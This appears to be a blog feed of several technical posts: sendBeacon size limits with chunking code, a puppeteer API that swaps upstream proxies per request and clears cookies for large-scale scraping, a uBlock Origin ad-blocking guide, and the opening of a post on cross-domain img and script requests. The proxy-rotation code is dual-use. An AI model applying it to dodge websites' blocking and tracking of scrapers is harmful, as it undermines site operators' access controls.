<p>This question was <a href="https://stackoverflow.com/questions/28989640/navigator-sendbeacon-data-size-limits#">already asked on Stack Overflow</a>, and it seems that the maximum payload is <code>2^16 = 65536 bytes</code>.</p>
<p>This means that analytics data needs to be either compressed or sent in chunks (or both actually).</p>
<p>Some good compression libraries for JavaScript would be <a href="https://github.com/nodeca/pako">pako</a> and <a href="https://github.com/101arrowz/fflate">fflate</a>. fflate is probably the better choice, since it is smaller and faster.</p>
<p>Another solution would be to just send the analytics data to the server as soon as we approach the 65536 byte limit and then reassemble the chunks on the server. </p>
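<p>The chunking approach could look roughly like the sketch below. It assumes that the analytics data is an array of small event objects and adds a hypothetical <code>seq</code> field so that the server can restore the order. The function names <code>chunkEvents</code> and <code>reassemble</code> are made up for this example.</p>

```javascript
var MAX_BEACON_BYTES = 65536;

// Length of a string in bytes when encoded as UTF-8.
function byteLength(str) {
  return new TextEncoder().encode(str).length;
}

// Client side: split the events into JSON payloads of at most maxBytes each.
// An event that exceeds maxBytes on its own is still emitted as one chunk.
function chunkEvents(uuid, events, maxBytes) {
  var chunks = [];
  var current = [];
  events.forEach(function (event) {
    var candidate = JSON.stringify({ uuid: uuid, seq: chunks.length, data: current.concat([event]) });
    if (current.length > 0 && byteLength(candidate) > maxBytes) {
      // Adding this event would exceed the limit: close the current chunk.
      chunks.push(JSON.stringify({ uuid: uuid, seq: chunks.length, data: current }));
      current = [event];
    } else {
      current.push(event);
    }
  });
  if (current.length > 0) {
    chunks.push(JSON.stringify({ uuid: uuid, seq: chunks.length, data: current }));
  }
  return chunks;
}

// Server side: merge the payloads of one uuid back into a single event list.
function reassemble(payloads) {
  return payloads
    .map(function (payload) { return JSON.parse(payload); })
    .sort(function (a, b) { return a.seq - b.seq; })
    .reduce(function (all, chunk) { return all.concat(chunk.data); }, []);
}
```

<p>Each chunk would then be passed to <code>navigator.sendBeacon()</code> separately. Since <code>sendBeacon()</code> returns <code>false</code> when the browser could not queue the data, it is worth checking the return value for every chunk.</p>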
<h3>Statistics</h3>
<p>In this section, statistics of analytics sessions will be published as soon as enough data has been gathered. This data should show how many browsers support the combination of <code>visibilitychange</code> and <code>navigator.sendBeacon()</code>.</p>
<p>To be done. </p>
<h3>Conclusion</h3>
<p>There are several tricky problems that need to be solved when you want to create an analytics application that is widely supported on most browsers.</p>
<p>To summarize, the following problems were solved in this blog article:</p>
<ol>
<li>What event is the best to listen for when you want to capture the moment a user leaves or terminates the browsing session? <strong>Answer: <code>visibilitychange</code></strong></li>
<li>What HTTP API is the best to use in order to transmit your analytics data to the remote server? <strong>Answer: <code>navigator.sendBeacon()</code></strong></li>
</ol>
Dynamically changing proxies with puppeteer 2020-12-20T00:22:00+01:00 2020-12-21T22:23:00+01:00 Nikolai Tschacher tag:incolumitas.com,2020-12-20:/2020/12/20/dynamically-changing-puppeteer-proxies/
<p>The Chrome browser controlled via puppeteer doesn't support the dynamic change of proxies without restarting the browser. In this tutorial, I demonstrate how to implement this functionality with the help of a third party npm module named <code>proxy-chain</code>. This module acts as an intermediate proxy.</p>
<p>The Chrome browser does not support fine-grained proxy configuration out of the box. Therefore, the following use cases are not possible when using puppeteer in combination with Google Chrome:</p>
<ul>
<li>Using different proxies for different tabs/windows</li>
<li>Switching proxies without restarting the browser</li>
</ul>
<p>This is a bit annoying, because restarting the entire browser is an expensive operation in terms of computational resources. A Chrome restart takes up to two seconds (depending on the system). Ideally, we want to switch proxies whenever the need arises without restarting the entire Chrome process. This is a common requirement when scraping websites at scale.</p>
<p>One solution is to use an intermediate proxy server that routes traffic to the upstream proxy. This is exactly what I am going to implement in this blog post.</p>
<p>This is the design and network flow of the intended solution:</p>
<div class="highlight"><pre><span></span><code><span class="p">[</span><span class="n">local</span><span class="w"> </span><span class="n">Chrome</span><span class="w"> </span><span class="n">instance</span><span class="p">]</span><span class="w"> </span><span class="o"><====></span><span class="w"> </span><span class="p">[</span><span class="n">local</span><span class="w"> </span><span class="n">intermediate</span><span class="w"> </span><span class="n">proxy</span><span class="w"> </span><span class="n">server</span><span class="p">]</span><span class="w"> </span><span class="o"><====></span><span class="w"> </span><span class="p">[</span><span class="n">upstream</span><span class="w"> </span><span class="n">proxy</span><span class="p">]</span><span class="w"> </span><span class="o"><====></span><span class="w"> </span><span class="p">[</span><span class="n">target</span><span class="w"> </span><span class="n">website</span><span class="p">]</span><span class="w"></span>
</code></pre></div>
<p>In this tutorial, I will build a very simple API that allows the caller to make requests with the Chrome browser. The caller can specify the following parameters:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span>
<span class="s2">"url"</span><span class="o">:</span> <span class="s2">"string"</span><span class="p">,</span>
<span class="s2">"proxy"</span><span class="o">:</span> <span class="s2">"string"</span>
<span class="p">}</span>
</code></pre></div>
<p>The response contains the rendered HTML. If a valid proxy is specified, the URL is requested through that proxy; if no proxy is passed, none is used. The browser is never restarted between requests. Browser cookies are cleared between API calls to prevent websites from tracking the browser session with identifying cookies.</p>
<h3>Implementation</h3>
<p>The up-to-date source code can be found in the respective <a href="https://github.com/NikolaiT/dynamically-changing-puppeteer-proxies">Github repository</a>.</p>
<p>Without further ado, the full implementation of the proof of concept can be found in the code snippet below.</p>
<p>In order to set up the program, you need to issue the following command:</p>
<div class="highlight"><pre><span></span><code>npm i puppeteer-core express body-parser valid-url proxy-chain
</code></pre></div>
<p>Then copy the code snippet below, save it as <code>dynamic-proxy-API.js</code>, and execute it with:</p>
<div class="highlight"><pre><span></span><code>node dynamic-proxy-API.js
</code></pre></div>
<p>The API can be used with a sample proxy such as <code>http://11.22.33.44:1234/</code> by making a curl request (here requesting the website <code>http://httpbin.org/get</code>):</p>
<div class="highlight"><pre><span></span><code>curl -i <span class="s2">"http://localhost:3333/api?url=http://httpbin.org/get&proxy=http://11.22.33.44:1234/"</span>
</code></pre></div>
<p>On the initial API call, the browser will be launched. The next API call with a new proxy <code>http://22.22.22.22:2222/</code> will use the same browser session but with a new proxy.</p>
<div class="highlight"><pre><span></span><code>curl -i <span class="s2">"http://localhost:3333/api?url=http://httpbin.org/get&proxy=http://22.22.22.22:2222/"</span>
</code></pre></div>
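<p>The curl examples pass the target URL and the proxy URL unencoded in the query string, which breaks as soon as the target URL contains its own <code>&</code> or <code>#</code>. A small sketch of building the request URL with proper encoding follows. The helper name <code>buildApiUrl</code> is an assumption for illustration, and the base URL is taken from the examples above.</p>

```javascript
// Hypothetical helper: builds the API request URL with percent-encoded
// query parameters. The proxy parameter is optional.
function buildApiUrl(target, proxy) {
  var api = new URL('http://localhost:3333/api');
  api.searchParams.set('url', target);
  if (proxy) {
    api.searchParams.set('proxy', proxy);
  }
  return api.toString();
}

var requestUrl = buildApiUrl('http://httpbin.org/get?a=1&b=2', 'http://11.22.33.44:1234/');
console.log(requestUrl);
```

<p>The resulting string can be passed to curl or to <code>fetch()</code>. The server receives the original values in <code>req.query.url</code> and <code>req.query.proxy</code>, because Express decodes the query string.</p>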
<p>Below is the dynamic proxy API. If there are any problems with the source code, please leave an <a href="https://github.com/NikolaiT/dynamically-changing-puppeteer-proxies">issue here</a>.</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">express</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'express'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">bodyParser</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'body-parser'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">validUrl</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'valid-url'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'puppeteer-core'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">ProxyChain</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'proxy-chain'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">CHROME_BINARY_PATH</span> <span class="o">=</span> <span class="s1">'/usr/bin/chromium-browser'</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">app</span> <span class="o">=</span> <span class="nx">express</span><span class="p">();</span>
<span class="kd">const</span> <span class="nx">port</span> <span class="o">=</span> <span class="mf">3333</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">proxyServerPort</span> <span class="o">=</span> <span class="mf">8947</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">browser</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="c1">// Register a single JSON parser: an earlier express.json() would enforce its default 100kb limit first</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">bodyParser</span><span class="p">.</span><span class="nx">json</span><span class="p">({</span> <span class="nx">limit</span><span class="o">:</span> <span class="s1">'2mb'</span> <span class="p">}));</span>
<span class="kd">function</span> <span class="nx">log</span><span class="p">(</span><span class="nx">msg</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`[</span><span class="si">${</span><span class="p">(</span><span class="ow">new</span> <span class="nb">Date</span><span class="p">()).</span><span class="nx">getTime</span><span class="p">()</span><span class="si">}</span><span class="sb">] - </span><span class="si">${</span><span class="nx">msg</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">validateProxy</span><span class="p">(</span><span class="nx">proxy</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">match</span> <span class="o">=</span> <span class="kc">false</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">prefixes</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'http://'</span><span class="p">,</span> <span class="s1">'https://'</span><span class="p">,</span> <span class="s1">'socks://'</span><span class="p">,</span> <span class="s1">'socks5://'</span><span class="p">,</span> <span class="s1">'socks4://'</span><span class="p">];</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">prefix</span> <span class="k">of</span> <span class="nx">prefixes</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">proxy</span><span class="p">.</span><span class="nx">startsWith</span><span class="p">(</span><span class="nx">prefix</span><span class="p">))</span> <span class="p">{</span>
<span class="nx">match</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">match</span> <span class="o">===</span> <span class="kc">false</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="kc">false</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">validUrl</span><span class="p">.</span><span class="nx">isWebUri</span><span class="p">(</span><span class="nx">proxy</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">getBrowser</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">browser</span> <span class="o">===</span> <span class="kc">null</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span>
<span class="nx">executablePath</span><span class="o">:</span> <span class="nx">CHROME_BINARY_PATH</span><span class="p">,</span>
<span class="nx">headless</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="nx">args</span><span class="o">:</span> <span class="p">[</span><span class="sb">`--proxy-server=http://localhost:`</span> <span class="o">+</span> <span class="nx">proxyServerPort</span><span class="p">],</span>
<span class="p">});</span>
<span class="nx">log</span><span class="p">(</span><span class="s1">'Browser started'</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">startProxyServer</span><span class="p">(</span><span class="nx">proxy</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">server</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">ProxyChain</span><span class="p">.</span><span class="nx">Server</span><span class="p">({</span>
<span class="nx">port</span><span class="o">:</span> <span class="nx">proxyServerPort</span><span class="p">,</span>
<span class="nx">verbose</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="nx">prepareRequestFunction</span><span class="o">:</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">params</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="p">{</span><span class="nx">request</span><span class="p">,</span> <span class="nx">username</span><span class="p">,</span> <span class="nx">password</span><span class="p">,</span> <span class="nx">hostname</span><span class="p">,</span> <span class="nx">port</span><span class="p">,</span> <span class="nx">isHttp</span><span class="p">,</span> <span class="nx">connectionId</span><span class="p">}</span> <span class="o">=</span> <span class="nx">params</span><span class="p">;</span>
<span class="k">return</span> <span class="p">{</span>
<span class="nx">requestAuthentication</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="c1">// http://username:password@proxy.example.com:3128</span>
<span class="nx">upstreamProxyUrl</span><span class="o">:</span> <span class="nx">proxy</span><span class="p">,</span>
<span class="p">};</span>
<span class="p">},</span>
<span class="p">});</span>
<span class="c1">// Emitted when HTTP connection is closed</span>
<span class="nx">server</span><span class="p">.</span><span class="nx">on</span><span class="p">(</span><span class="s1">'connectionClosed'</span><span class="p">,</span> <span class="p">(</span><span class="nx">params</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="p">{</span><span class="nx">connectionId</span><span class="p">,</span> <span class="nx">stats</span><span class="p">}</span> <span class="o">=</span> <span class="nx">params</span><span class="p">;</span>
<span class="nx">log</span><span class="p">(</span><span class="sb">`Connection </span><span class="si">${</span><span class="nx">connectionId</span><span class="si">}</span><span class="sb"> closed`</span><span class="p">);</span>
<span class="p">});</span>
<span class="c1">// Emitted when HTTP request fails</span>
<span class="nx">server</span><span class="p">.</span><span class="nx">on</span><span class="p">(</span><span class="s1">'requestFailed'</span><span class="p">,</span> <span class="p">(</span><span class="nx">params</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="p">{</span><span class="nx">request</span><span class="p">,</span> <span class="nx">error</span><span class="p">}</span> <span class="o">=</span> <span class="nx">params</span><span class="p">;</span>
<span class="nx">log</span><span class="p">(</span><span class="sb">`Request </span><span class="si">${</span><span class="nx">request</span><span class="p">.</span><span class="nx">url</span><span class="si">}</span><span class="sb"> failed with error </span><span class="si">${</span><span class="nx">error</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="p">});</span>
<span class="nx">server</span><span class="p">.</span><span class="nx">listen</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">log</span><span class="p">(</span><span class="sb">`ProxyServer listening on port </span><span class="si">${</span><span class="nx">server</span><span class="p">.</span><span class="nx">port</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="nx">resolve</span><span class="p">(</span><span class="nx">server</span><span class="p">);</span>
<span class="p">});</span>
<span class="p">});</span>
<span class="p">}</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">clearCookies</span><span class="p">(</span><span class="nx">page</span><span class="p">)</span> <span class="p">{</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nx">log</span><span class="p">(</span><span class="s1">'Deleting cookies with Network.clearBrowserCookies'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">client</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">target</span><span class="p">().</span><span class="nx">createCDPSession</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">client</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'Network.clearBrowserCookies'</span><span class="p">);</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">log</span><span class="p">(</span><span class="sb">`Could not delete cookies: </span><span class="si">${</span><span class="nx">err</span><span class="p">.</span><span class="nx">toString</span><span class="p">()</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/api'</span><span class="p">,</span> <span class="k">async</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">proxy</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">validateProxy</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">proxy</span><span class="p">))</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">403</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="s1">'Invalid proxy format'</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nx">log</span><span class="p">(</span><span class="sb">`Using proxy: </span><span class="si">${</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">proxy</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">url</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">validUrl</span><span class="p">.</span><span class="nx">isWebUri</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">url</span><span class="p">))</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">403</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="sb">`url is not valid`</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">403</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="sb">`url is required`</span><span class="p">);</span>
<span class="p">}</span>
<span class="kd">let</span> <span class="nx">proxyServer</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">startProxyServer</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">proxy</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">getBrowser</span><span class="p">();</span>
<span class="kd">let</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">url</span><span class="p">,</span> <span class="p">{</span> <span class="nx">waitUntil</span><span class="o">:</span> <span class="s2">"domcontentloaded"</span> <span class="p">});</span>
<span class="kd">let</span> <span class="nx">content</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">content</span><span class="p">();</span>
<span class="c1">// clear cookies after we are done</span>
<span class="k">await</span> <span class="nx">clearCookies</span><span class="p">(</span><span class="nx">page</span><span class="p">);</span>
<span class="nx">proxyServer</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">set</span><span class="p">(</span><span class="s1">'Content-Type'</span><span class="p">,</span> <span class="s1">'text/html'</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nx">Buffer</span><span class="p">.</span><span class="kr">from</span><span class="p">(</span><span class="nx">content</span><span class="p">));</span>
<span class="p">});</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">listen</span><span class="p">(</span><span class="nx">port</span><span class="p">,</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">log</span><span class="p">(</span><span class="sb">`Dynamic proxy puppeteer Api listening on port </span><span class="si">${</span><span class="nx">port</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="p">});</span>
</code></pre></div>Remove YouTube Ads from your Android Phone2020-12-16T19:14:00+01:002020-12-18T19:32:00+01:00Nikolai Tschachertag:incolumitas.com,2020-12-16:/2020/12/16/removing-youtube-ads-from-android-phone/<p>I am a heavy user of YouTube. I use it to listen to podcasts while cooking or in order to watch the latest documentaries before going to sleep. But lately, the extremely aggressive advertisement of YouTube sparked enough motivation within myself to remove YouTube ads for good. Google overdid it. I have had enough.</p><p>This guide works both for Android and iPhone users. It will show you how to get rid of YouTube ads on your smartphone in five easy steps.</p>
<p>Google makes it technically impossible to remove YouTube ads in the native YouTube app on your smartphone. You have no other option than to watch up to ten advertisement clips for every video. Those ads can be extremely annoying.</p>
<p>At the time of writing, YouTube is playing more ads than the worst private cable TV channel ever did. This is no longer acceptable!</p>
<p>Google is hoarding enormous amounts of wealth and monopolizes the Internet search and advertisement markets. While I can understand that content creators want to be paid, I will not tolerate those extremely annoying ads any longer.</p>
<p>I endured this for a very long time, but enough is enough. In this blog article, I provide step-by-step instructions on how to get rid of YouTube ads for good.</p>
<p>So what do I want?</p>
<ol>
<li>I want YouTube videos without any ads</li>
<li>I don't want to install some shady third party app on my phone</li>
<li>YouTube needs to be more or less as easy to use as it is in the native app</li>
<li>Bonus: I want to continue watching/listening to YouTube when my phone is in sleep mode. For example, I often listen to podcasts while walking around.</li>
</ol>
<h3>Tutorial: Remove YouTube Ads with Firefox and uBlock Origin</h3>
<p>I came up with the following solution: I will install the Firefox mobile browser and then add the uBlock Origin extension to it. This will remove all ads on all websites, including YouTube!</p>
<p>What follows are instructions that you can follow in order to remove all ads from YouTube:</p>
<p><strong>Step 1:</strong> Install Firefox from the Android Play Store.</p>
<figure>
<img class="smallimg" src="https://incolumitas.com/images/android/install-firefox.png" alt="Install Firefox from the playstore" />
<figcaption>Install Firefox from the Android Play Store</figcaption>
</figure>
<p><strong>Step 2:</strong> After Firefox is installed, open the Firefox browser.</p>
<p><strong>Step 3:</strong> In Firefox -> click on the "three-dot menu" at the bottom right -> Addons -> Addon manager -> enable uBlock Origin</p>
<figure>
<img class="smallimg" src="https://incolumitas.com/images/android/firefox-menu.png" alt="Open the firefox menu" />
<figcaption>Open the browser settings...</figcaption>
</figure>
<figure>
<img class="smallimg" src="https://incolumitas.com/images/android/firefox-addons.png" alt="Open the addons manager" />
<figcaption>...And add uBlock Origin from the addons menu</figcaption>
</figure>
<p><strong>Step 4:</strong> After uBlock Origin is enabled, you can navigate to YouTube (or any other website) and enjoy it without any ads!</p>
<p><strong>Step 5:</strong> Add YouTube from Firefox as a shortcut to your Android home screen. Replace the native YouTube app icon with it so that you never have to use the native YouTube app with ads again.</p>
<figure>
<img class="smallimg" src="https://incolumitas.com/images/android/youtube-homescreen.png" alt="Add a YouTube shortcut to the homescreen" />
<figcaption>Add a Firefox YouTube shortcut to the homescreen</figcaption>
</figure>
<p>Using YouTube from Firefox is not quite as fast as the native app, but in my experience, not having to worry about extremely annoying ads is much better than using the native app! And YouTube from within the Firefox browser is reasonably fast! There are no major issues and the content is exactly the same - just without ads.</p>
<h3>Native YouTube App</h3>
<p>Unfortunately, <a href="https://adlock.com/blog/how-to-block-youtube-ads-on-android/">it is not possible</a> to block advertisements in the native YouTube app.</p>
<blockquote>
<p>To remove ads from applications that use secure connections (e.g., HTTPS), the ad blocker must launch a MITM attack, replacing the application’s security certificates with its certificate.</p>
</blockquote>
<p>The issue is that applications targeting Android API level 24 and above distrust user-installed certificates, and thus there is no way to remove ads on the fly.</p>
<blockquote>
<p>But since the latest Android update for Nougat, all applications targeting API level 24 and above (YouTube is one of these applications) distrust certificates hosted in the user’s trust store. This means that the videos on the YouTube app will not play if we try to replace its security certificate with our own to remove ads.</p>
</blockquote>Abusing image tags for cross domain requests2020-12-15T20:50:00+01:002020-12-15T20:50:00+01:00Nikolai Tschachertag:incolumitas.com,2020-12-15:/2020/12/15/abusing-img-tags-for-cross-domain-requests/<p>Cross domain requests with <code><img></code> tags are not bound to the same origin policy. I will shed light on several possibilities how malicious web site owners can potentially abuse cross domain request done with <code><img></code> and <code>script</code> tags created with JavaScript.</p><p>I am currently in the process of developing an analytics application in JavaScript. One of my requirements is to transmit analytics data right before the user leaves the surveyed website. A common strategy is to send the analytics data when the event <code>visibilitychange</code> is fired and the <code>visibilityState</code> changes to <code>hidden</code>:</p>
<div class="highlight"><pre><span></span><code><span class="nb">document</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"visibilitychange"</span><span class="p">,</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">visibilityState</span> <span class="o">===</span> <span class="s1">'hidden'</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// somehow send analytics data back home</span>
<span class="c1">// for example like this:</span>
<span class="nx">navigator</span><span class="p">.</span><span class="nx">sendBeacon</span><span class="p">(</span><span class="nx">url</span><span class="p">,</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">data</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">});</span>
</code></pre></div>
<p>However, other people that also rely on a stable cross browser transmission solution pointed out that <code>navigator.sendBeacon</code> is not the most reliable method. See for example this blog post: <a href="https://volument.com/blog/sendbeacon-is-broken">Beacon API is broken</a>.</p>
<p>This is why some people suggest using the good old <code><img></code> tag to transmit data. The idea is to transmit your data in the query string of a GET request similar to this:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">image</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Image</span><span class="p">;</span>
<span class="nx">image</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="s1">'https://example.org?data=someDataToStore'</span><span class="p">;</span>
</code></pre></div>
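<p>Real analytics data needs to be URL-encoded before it goes into the query string. Below is a minimal sketch of how this could look. The helper names <code>buildBeaconUrl</code> and <code>sendViaImage</code> as well as the path <code>/t</code> are assumptions made for illustration only, and the sketch only handles flat objects with primitive values:</p>

```javascript
// Hypothetical helper: serialize a flat object into the query string of a URL.
// URLSearchParams takes care of percent-encoding the keys and values.
function buildBeaconUrl(baseUrl, data) {
  const url = new URL(baseUrl);
  for (const [key, value] of Object.entries(data)) {
    url.searchParams.set(key, String(value));
  }
  return url.toString();
}

// Hypothetical helper: fire the GET request through an image.
// Outside of a browser (no Image constructor) only the URL is built.
function sendViaImage(baseUrl, data) {
  const src = buildBeaconUrl(baseUrl, data);
  if (typeof Image !== 'undefined') {
    const image = new Image();
    image.src = src; // assigning src triggers the request
  }
  return src;
}
```

<p>Keep in mind that the whole payload has to fit into the URL, so this approach is only suitable for small amounts of data.</p>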
<p>The advantage is that requests originating from an <code><img></code> tag are not subject to the same origin policy. This means that cross domain requests are allowed. An alternative to <code><img></code> tags is to use a script tag to make a cross origin request:</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="nx">addScript</span><span class="p">(</span><span class="nx">src</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">script</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="s1">'script'</span><span class="p">);</span>
<span class="nx">script</span><span class="p">.</span><span class="nx">setAttribute</span><span class="p">(</span><span class="s1">'src'</span><span class="p">,</span> <span class="nx">src</span><span class="p">);</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">appendChild</span><span class="p">(</span><span class="nx">script</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p>The same origin policy is very important for browser security. It prevents scripts from reading the responses of HTTP requests made to domains other than the origin of the webpage. For example, JavaScript loaded from the domain <code>example.org</code> cannot make a <code>fetch()</code> request to another domain and read the response (except for domains where the <code>Access-Control-Allow-Origin</code> header is configured accordingly).</p>
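<p>To illustrate what "accordingly configured" could mean on the server side, here is a rough sketch that decides which CORS response headers to send for a given <code>Origin</code> request header. The function name <code>corsHeadersFor</code> and the allow-list are hypothetical, and a real setup would more likely rely on existing middleware:</p>

```javascript
// Hypothetical allow-list; these origins are placeholders.
const ALLOWED_ORIGINS = ['https://example.org', 'https://www.example.org'];

// Returns the CORS response headers for the given Origin request header.
function corsHeadersFor(requestOrigin, allowedOrigins = ALLOWED_ORIGINS) {
  if (!allowedOrigins.includes(requestOrigin)) {
    // No CORS headers: the browser will not expose the response to the script.
    return {};
  }
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    // Tell caches that the response differs per Origin header.
    'Vary': 'Origin',
  };
}
```

<p>Note that this only controls whether the calling script may read the response. It does not stop the request from reaching the server.</p>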
<p>Since requesting scripts will only work when the requested resource is served with the <code>content-type: application/javascript; charset=utf-8</code> response header and images are only obtained when the response header content type is something like <code>content-type: image/webp</code>, we have no way to read the response contents of a cross domain request.</p>
